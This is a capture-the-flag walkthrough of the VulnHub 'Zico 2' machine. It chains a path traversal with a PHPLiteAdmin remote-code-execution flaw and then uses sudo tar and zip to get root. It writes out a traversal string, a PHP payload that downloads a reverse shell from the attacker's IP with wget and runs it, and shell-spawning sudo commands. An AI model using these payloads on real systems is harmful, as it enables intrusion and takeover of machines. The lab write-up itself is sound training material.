CTF Walkthroughs, VulnHub

VulnHub – Zico 2 Walkthrough

Introduction

This was an easy Linux machine that involved chaining a path traversal and PHP remote code execution vulnerability affecting two web applications to gain initial access, and the Zip/Tar binaries with Sudo permissions enabled to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified three open ports: port 22 (SSH), port 80 (HTTP), and port 111 (RPC). The next step will be to start enumerating HTTP.

Enumerating HTTP

When accessing the site through a browser, the following page is displayed:

When navigating to Tools, it looks like the “page” parameter may be vulnerable to path traversal

When using the following value, it was possible to access the local /etc/passwd file:

../../.././../etc/passwd

This could not be exploited through log poisoning as the logs did not seem to be located in the default directory and remote file inclusion did not work.

The next step is to run a scan to find hidden files or directories using Wfuzz, with the following flags:

  • –hc to exclude certain response codes
  • -w to specify the word list to use
  • specifying the URL to scan, using FUZZ to indicate which part to fuzz

WFuzz has identified a “dbadmin” entry, when navigating to it a PHPLiteAdmin portal is displayed:

As it turned out, the default “admin” password was still in use:

The version appears to be v1.9.3. Using the SearchSploit tool to identify known vulnerabilities affecting this specific version:

It appears this version is affected by a remote code execution vulnerability that allows to create arbitrary PHP files on the server by creating a new database and inserting a new field with PHP code as its default value:

phpliteadmin.php#1784: 'Creating a New Database' => 
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Exploiting PHPLiteAdmin Remote Code Execution

Creating a new “hack.php” database:

Adding a new “test” table with one “test” integer field, using a value of “<?php phpinfo()?>”:

When navigating to the “hack.php” file created by the exploit above through the path traversal vulnerability found earlier, phpinfo() is executed:

Copying the Laudanum PHP Reverse Shell to the current directory and changing the IP address and port:

Setting up a Python Simple HTTP Server to host it:

Dropping the existing table and creating a new one, containing one field with the following value, which will download and execute the PHP reverse shell:

<?php system("wget 10.0.0.158:8000/php-reverse-shell.php -O /tmp/reverse-shell.php; php /tmp/reverse-shell.php"); ?>')

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Upon navigating to the hack.php file again, a reverse shell as the www-data user is received:

Privilege Escalation

When inspecting the wp-config.php file, which usually contains database connection credentials, a password is found:

As it turns out the password was re-used for the “zico” user present on the box:

When executing sudo -l, it appears the current user can execute Tar and Zip as root:

Upon consulting GTFOBins, it appears tar can be exploited when running as sudo. Tar has an argument called –checkpoint, which allows to display a “progress” message every time X number of files have been archived. This can be used in concatenation with the –checkpoint-action flag, which allows to execute an action, in form of a binary or script, whenever a checkpoint is reached.

Executing the following command to run /bin/sh when Tar is executed:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

This has granted root-level access to the machine. Another way to escalate privileges is through Zip:

The following command exploits the -TT argument, which allows to run a command after the archive is extracted, in order to test it:

sudo zip $TF /etc/hosts -T -TT 'sh #'

Conclusion

This was a really interesting box and a very good example of how multiple vulnerabilities that would normally not produce much result can be often chained together to obtain remote code execution.